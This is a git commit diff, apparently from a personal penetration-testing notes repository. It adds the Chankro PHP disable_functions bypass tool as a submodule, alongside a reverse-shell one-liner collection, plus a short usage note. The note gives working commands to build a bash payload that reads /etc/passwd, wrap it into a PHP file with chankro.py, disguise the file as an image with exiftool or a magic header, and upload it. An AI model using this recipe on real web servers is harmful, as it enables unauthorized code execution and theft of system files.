added php Preload lib exploit

2021-09-11 16:00:40 +02:00 · 2021-09-11 16:00:40 +02:00 · a41a43b6e7
parent 55970b5c82
commit a41a43b6e7
3 changed files with 19 additions and 0 deletions
--- a/.gitmodules
+++ b/.gitmodules
@ -28,3 +28,6 @@
 [submodule "reverse_shells/One-Lin3r"]
 	path = reverse_shells/One-Lin3r
 	url = https://github.com/D4Vinci/One-Lin3r.git
+[submodule "exploit/web/php/Chankro"]
+	path = exploit/web/php/Chankro
+	url = https://github.com/TarlogicSecurity/Chankro.git
--- a/exploit/web/php/Chankro
+++ b/exploit/web/php/Chankro
@ -0,0 +1 @@
+Subproject commit 7b6e844e18f6812beb18db4b67b246edcec04b84
--- a/exploit/web/php/preload_lib.md
+++ b/exploit/web/php/preload_lib.md
@ -0,0 +1,15 @@
+# Preload Library
+
+* [Bug report](https://bugs.php.net/bug.php?id=46741)
+* [Chankro repo](https://github.com/TarlogicSecurity/Chankro.git)
+
+## Usage
+* Create lib, find path via `<URL>/phpinfo.php`
+```sh
+echo "#!/usr/bin/env bash" > rev.sh
+echo "cat /etc/passwd > <basepath>/output.txt" >> rev.sh
+
+python2 ./chankro.py --arch 64 --input rev.sh --output chan.php --path <basepath>
+```
+* Put into image file via exiftool or write magic header
+* Upload
				`@ -0,0 +1 @@`
				`Subproject commit 7b6e844e18f6812beb18db4b67b246edcec04b84`